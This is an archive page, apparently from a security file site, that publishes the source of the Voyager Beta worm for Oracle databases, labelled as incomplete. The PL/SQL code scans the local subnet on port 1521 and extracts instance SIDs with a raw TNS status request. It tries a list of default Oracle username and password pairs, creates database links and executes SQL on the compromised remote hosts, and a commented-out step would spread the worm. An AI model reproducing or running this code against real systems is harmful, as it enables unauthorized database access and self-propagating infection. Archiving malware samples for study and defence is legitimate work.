what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

voyagerWorm.txt

voyagerWorm.txt
Posted Nov 1, 2005

Snippet of code from the Voyager Beta worm.

tags | worm
SHA-256 | 0a9d34add4e646f517537712d241a8537ff7a4bcc502318fa6bb16b5087e7474

voyagerWorm.txt

Change Mirror Download
Voyager Beta worm - not complete - maybe someone else has time to 
look at it


set serveroutput on
set verify off

DECLARE

i1 INTEGER;
i2 INTEGER;

iHostToSearchFor INTEGER;

current_ipaddress VARCHAR2(100);
current_network VARCHAR2(100);
current_letter VARCHAR2(1);

c UTL_TCP.CONNECTION;
ln integer;

vLen NUMBER;

PreviousSID varchar2(100);

vRequest varchar2(500);
vResp varchar2(32767);
vRespPiece varchar2(200);
vRespTemp varchar2(200);
ret_val pls_integer;

BEGIN

current_ipaddress := utl_inaddr.get_host_address;
ln := length(current_ipaddress);

loop
current_letter := substr(current_ipaddress, ln, 1);
ln := ln - 1;

EXIT WHEN current_letter = '.';
EXIT WHEN ln = 0;
end loop;

current_network := substr(current_ipaddress, 1, ln);

dbms_output.put_line( 'network to search: ' || current_network );
dbms_output.put_line( 'starting: ' || to_char(sysdate, 'MI:SS') );

iHostToSearchFor := 220;

vRequest := chr(0) || chr(89) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) ||
chr(8) || chr(0) ||
chr(127) || chr(255) || chr(127) || chr(8) || chr(0) || chr(0) ||
chr(0) || chr(1) ||
chr(0) || chr(31) || chr(0) || chr(58) || chr(0) || chr(0) ||
chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0)
|| chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(230) ||
chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0)
|| chr(0) ||
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=status))';

loop
begin
vResp := '';
PreviousSID := '';

c := UTL_TCP.OPEN_CONNECTION(current_network || '.' ||
iHostToSearchFor, 1521);
dbms_output.put_line( 'found live port @ ' || to_char(sysdate,
'MI:SS') || ' - ' || current_network || '.' || iHostToSearchFor);
ret_val := UTL_TCP.WRITE_RAW(c, utl_raw.cast_to_raw(vRequest));
vLen := UTL_TCP.READ_RAW(c, vResp, 100 );

vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 43,
58));
vResp := vRespPiece;

declare
read_from_network varchar2(32000);
length_read_from_network INTEGER;
begin

loop
read_from_network := '';
length_read_from_network := UTL_TCP.READ_RAW(c,
read_from_network, 100 );
read_from_network :=
utl_raw.cast_to_varchar2(utl_raw.substr(read_from_network, 1,
length_read_from_network));
vResp := vResp || read_from_network;

end loop;

EXCEPTION
when OTHERS then
read_from_network := '';
end;

-- look for INSTANCE_NAME= and then for )

-- dbms_output.put_line( substr( vResp, 1, 254) );
-- dbms_output.put_line( substr( vResp, 255, 254) );
-- dbms_output.put_line( substr( vResp, 510, 254) );


UTL_TCP.CLOSE_CONNECTION(c);

declare
i3 INTEGER;
i4 INTEGER;
sid varchar2(100);
cur binary_integer;
i binary_integer;
procedure_to_spread varchar2(32000);
create_link varchar2(500);
begin

i3 := 1;
i4 := 1;

loop

i3 := instr(vResp, '(INSTANCE_NAME=', i3);
exit when i3 = 0;

i4 := instr(vResp, ')', i3);
sid := substr( vResp, i3 + 15, i4 - (i3 + 15));
dbms_output.put_line( 'Found SID of ' || sid );
i3 := i3 + 1;

begin
if sid = PreviousSID or sid = 'PLSExtProc' or sid =
'extproc'
then
-- don't do anything
dbms_output.put_line( 'Not trying the SID: ' || sid );
else
dbms_output.put_line( 'Attacking the SID: ' || sid );


loop

declare

iLoop integer := 0;
username1 varchar2(100);
password1 varchar2(100);

begin

iLoop := iLoop + 1;
exit when iLoop = 8;

if iLoop = 1 then
username1 := 'system';
password1 := 'manager';

else if iLoop = 2 then
username1 := 'sys';
password1 := 'change_on_install';

else if iLoop = 3 then
username1 := 'dbsnmp';
password1 := 'dbsnmp';

else if iLoop = 4 then
username1 := 'outln';
password1 := 'outln';

else if iLoop = 5 then
username1 := 'scott';
password1 := 'tiger';

else if iLoop = 6 then
username1 := 'mdsys';
password1 := 'mdsys';

else if iLoop = 7 then
username1 := 'ordcommon';
password1 := 'ordcommon';

end if;


cur := dbms_sql.open_cursor;
dbms_sql.parse(cur, 'drop database link xxx',
dbms_sql.v7);
i := dbms_sql.execute( cur );

create_link := 'CREATE DATABASE LINK xxx CONNECT TO ' ||
username1 || ' IDENTIFIED BY ' || password1 || ' USING
''(DESCRIPTION=(ADDRESS_LIST=(ADDRESS = (PROTOCOL = TCP)(HOST = '
|| iHostToSearchFor || ')(PORT =
1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=' || SID ||
')))';

dbms_sql.parse(cur, create_link, dbms_sql.v7);
i := dbms_sql.execute( cur );
dbms_sql.close_cursor(cur);

cur := dbms_sql.open_cursor@xxx;
-- dbms_sql.parse@xxx(cur, procedure_to_spread,
dbms_sql.v7);
-- i := dbms_sql.execute@xxx( cur );
dbms_sql.parse@xxx(cur, 'drop table x', dbms_sql.v7);
i := dbms_sql.execute@xxx( cur );
dbms_sql.parse@xxx(cur, 'CREATE TABLE X (Y DATE)' ,
dbms_sql.v7);
i := dbms_sql.execute@xxx( cur );
dbms_sql.close_cursor@xxx(cur);

exception
when others then
DBMS_OUTPUT.PUT_LINE('failed creating a database link
that worked ');

end if;

end loop;

end if;

PreviousSID := SID;

end;

end loop;

end;

EXCEPTION
when utl_tcp.NETWORK_ERROR then
DBMS_OUTPUT.PUT_LINE('nothing found @ ' || to_char(sysdate,
'MI:SS') || ' - ' || current_network || '.' || iHostToSearchFor);
end;

iHostToSearchFor := iHostToSearchFor - 1;
EXIT WHEN iHostToSearchFor = 216;
end loop;

dbms_output.put_line( 'finished the loop @ ' || to_char(sysdate,
'MI:SS') );

END;
/





Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close